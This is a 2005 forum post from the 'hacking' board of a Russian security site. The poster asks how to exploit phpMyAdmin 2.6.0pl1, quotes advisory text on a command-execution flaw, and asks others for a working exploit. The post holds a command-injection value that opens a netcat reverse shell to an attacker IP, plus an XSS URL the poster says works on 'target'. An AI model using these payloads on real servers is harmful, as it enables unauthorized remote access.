информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Портрет посетителяВсе любят медСтрашный баг в Windows
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Крупный взлом GoDaddy 
 Просроченный сертификат ломает... 
 Phrack #70/0x46 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
phpMyAdmin 06.07.05 15:28  Число просмотров: 2838
Автор: mks Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Есть сервер с установленным phpMyAdmin-2.6.0pl1. Судя по докам в этой версии существуют следующие уязвимости:

CAN-2004-1147 Command execution :
- bug introduced in 2.6.0-pl2
- attacker doesnotneed access to the phpMyAdmin interface
- PHP safe mode must be off
- external transformations must be activated
- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :
- attacker need access to the phpMyAdmin interface
- PHP safe mode must be off
- $cfg['UploadDir'] must be defined
- exploitation is done via 'sql_localfile'

phpMyAdmin prior to 2.6.0-pl2 is affected by a vulnerability in the MIME-based transformation system. A remote attacker could execute arbitrary commands with the privileges of the web server process by send a specially crafted request to the web server running phpMyAdmin. This vulnerability can be exploited only when PHP is not running in safe mode.

CAN 2004-1147
phpMyAdmin 2.6.0-pl2 introduced a vulnerability which could allow a remote, unauthenticated attacker to execute commands on the server. In order to exploit this vulnerability, PHP safe mode would need to be off, and external transformations would need to be activated. phpMyAdmin 2.6.1-rc1 fixes this vulnerability.

XSS вида http://target/phpmyadmin/main.php?"><script>alert()</script></ - работает на ура. А вот что касается выполнения комманд - облом.
Если кто сталкивался с этим вопросом, объясните плз что означает "F\'; \'A " в качестве какого параметра это вообще подставляется? М.б. у кого есть пример работающего эксплоита?
<hacking> Поиск 
  • phpMyAdmin - mks 06.07.05 15:28 [2838]








Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2021 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach